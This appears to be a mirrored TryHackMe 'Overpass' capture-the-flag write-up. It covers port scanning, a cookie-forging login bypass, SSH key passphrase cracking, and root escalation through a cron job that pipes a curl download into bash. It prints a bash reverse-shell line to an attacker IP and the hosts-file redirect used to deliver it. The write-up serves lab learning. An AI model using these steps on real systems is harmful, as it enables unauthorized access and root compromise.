mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-28 14:40:25 +00:00
165 lines
5.9 KiB
Markdown
165 lines
5.9 KiB
Markdown
|
# TryHackMe-Overpass
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```
|
||
|
nmap -sC -sV 10.10.124.118
|
||
|
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-10 22:35 PKT
|
||
|
Nmap scan report for 10.10.124.118
|
||
|
Host is up (0.18s latency).
|
||
|
Not shown: 998 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|
||
|
| ssh-hostkey:
|
||
|
| 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|
||
|
| 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|
||
|
|_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
|
||
|
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|
||
|
|_http-title: Overpass
|
||
|
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
|
||
|
```
|
||
|
|
||
|
## PORT 80
|
||
|
|
||
|
<img src="https://imgur.com/xcyfMJ0.png"/>
|
||
|
|
||
|
|
||
|
<img src="https://imgur.com/BulGTu9.png"/>
|
||
|
|
||
|
Download the file to see what's in it.
|
||
|
|
||
|
<img src="https://imgur.com/AvTo4vg.png"/>
|
||
|
|
||
|
There's also a source code in`golang` let's see maybe we can find something it in so we can exploit that binary.
|
||
|
|
||
|
<img src="https://imgur.com/HTCFWVM.png"/>
|
||
|
|
||
|
|
||
|
## Gobuster
|
||
|
|
||
|
```
|
||
|
root@kali:~/TryHackMe/Easy/Overpass# gobuster dir -u http://10.10.124.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||
|
===============================================================
|
||
|
Gobuster v3.0.1
|
||
|
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
||
|
===============================================================
|
||
|
[+] Url: http://10.10.124.118
|
||
|
[+] Threads: 10
|
||
|
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||
|
[+] Status codes: 200,204,301,302,307,401,403
|
||
|
[+] User Agent: gobuster/3.0.1
|
||
|
[+] Timeout: 10s
|
||
|
===============================================================
|
||
|
2020/11/10 22:50:19 Starting gobuster
|
||
|
===============================================================
|
||
|
/img (Status: 301)
|
||
|
/downloads (Status: 301)
|
||
|
/aboutus (Status: 301)
|
||
|
/admin (Status: 301)
|
||
|
/css (Status: 301)
|
||
|
```
|
||
|
We see that there's an `/admin` page
|
||
|
|
||
|
<img src="https://imgur.com/fpxT1P0.png"/>
|
||
|
|
||
|
Looking at the source we can see 3 javascript files , we are interested in `login.js` so let's view the source code
|
||
|
|
||
|
<img src="https://imgur.com/fJJxGie.png"/>
|
||
|
|
||
|
This is a vulnerabale piece of code that would make authenticate a user with invalid crdentials if he has a session so let's make a fake `SessionToken` with a browser extension named `EditThisCookie`
|
||
|
|
||
|
|
||
|
<img src="https://imgur.com/QUvzdrS.png"/>
|
||
|
|
||
|
On refreshing the page we will get the ssh key for `james`
|
||
|
|
||
|
<img src="https://imgur.com/YkdknxT.png"/>
|
||
|
|
||
|
But it's asking for the passphrase of `id_rsa` so we can get the hash of `id_rsa` with `ssh2john` and crack it with `johntheripper`
|
||
|
|
||
|
```
|
||
|
root@kali:~/TryHackMe/Easy/Overpass# /usr/share/john/ssh2john.py id_rsa > ssh_hash
|
||
|
root@kali:~/TryHackMe/Easy/Overpass# john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash
|
||
|
Using default input encoding: UTF-8
|
||
|
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
|
||
|
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
|
||
|
Cost 2 (iteration count) is 1 for all loaded hashes
|
||
|
Will run 4 OpenMP threads
|
||
|
Note: This format may emit false positives, so it will keep trying even after
|
||
|
finding a possible candidate.
|
||
|
Press 'q' or Ctrl-C to abort, almost any other key for status
|
||
|
james13 (id_rsa)
|
||
|
1g 0:00:00:03 31.13% (ETA: 20:37:40) 0.3125g/s 1444Kp/s 1444Kc/s 1444KC/s play646..play47
|
||
|
Session aborted
|
||
|
|
||
|
```
|
||
|
Then `ssh james@<ip> -i id_rsa`
|
||
|
|
||
|
<img src="https://imgur.com/vZId0He.png"/>
|
||
|
|
||
|
## Privilege Escalation
|
||
|
|
||
|
Host `linpeas.sh` on local machine and transfer it to target machine
|
||
|
<img src="https://imgur.com/uc27Vj1.png"/>
|
||
|
|
||
|
I didn't find anythin with linpeas so next thing that I looked at was a file `.overpass` in `james`'s home directroy , reading the content of the file it was gibberish
|
||
|
|
||
|
`,LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.`
|
||
|
|
||
|
I visited https://gchq.github.io/CyberChef/
|
||
|
|
||
|
<img src="https://imgur.com/FKVZOP5.png"/>
|
||
|
|
||
|
This password is for `james` but still he is not in group `sudoers`
|
||
|
<img src="https://imgur.com/hSCBu72.png"/>
|
||
|
|
||
|
That was a rabbit hole then check for cronjobs
|
||
|
|
||
|
```
|
||
|
james@overpass-prod:~$ cat /etc/crontab
|
||
|
# /etc/crontab: system-wide crontab
|
||
|
# Unlike any other crontab you don't have to run the `crontab'
|
||
|
# command to install the new version when you edit this file
|
||
|
# and files in /etc/cron.d. These files also have username fields,
|
||
|
# that none of the other crontabs do.
|
||
|
|
||
|
SHELL=/bin/sh
|
||
|
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
|
||
|
|
||
|
# m h dom mon dow user command
|
||
|
17 * * * * root cd / && run-parts --report /etc/cron.hourly
|
||
|
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
|
||
|
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
|
||
|
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
|
||
|
# Update builds from latest code
|
||
|
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
|
||
|
james@overpass-prod:~$
|
||
|
```
|
||
|
looking at `/etc/hosts` we can change this localhost to our local machine's address and add a reverse shell in bash with path `<our_vpn_ip>/downloads/src/buildscript.sh`
|
||
|
```
|
||
|
james@overpass-prod:~$ cat /etc/hosts
|
||
|
127.0.0.1 localhost
|
||
|
127.0.1.1 overpass-prod
|
||
|
127.0.0.1 overpass.thm
|
||
|
# The following lines are desirable for IPv6 capable hosts
|
||
|
::1 ip6-localhost ip6-loopback
|
||
|
fe00::0 ip6-localnet
|
||
|
ff00::0 ip6-mcastprefix
|
||
|
ff02::1 ip6-allnodes
|
||
|
ff02::2 ip6-allrouters
|
||
|
james@overpass-prod:~$
|
||
|
|
||
|
```
|
||
|
Now making directory `/downloads/src/buildscript.sh`
|
||
|
|
||
|
```
|
||
|
root@kali:~/TryHackMe/Easy/Overpass# mkdir downloads
|
||
|
root@kali:~/TryHackMe/Easy/Overpass# cd downloads/
|
||
|
root@kali:~/TryHackMe/Easy/Overpass/downloads# mkdir src
|
||
|
root@kali:~/TryHackMe/Easy/Overpass/downloads# echo "bash -i >& /dev/tcp/10.14.3.143/8080 0>&1" > buildscript.sh
|
||
|
root@kali:~/TryHackMe/Easy/Overpass/downloads# chmod +x buildscript.sh
|
||
|
```
|
||
|
<img src="https://imgur.com/XDMf6VA.png"/>
|
||
|
|
||
|
And just like that we will get the reverse shell as `root` !
|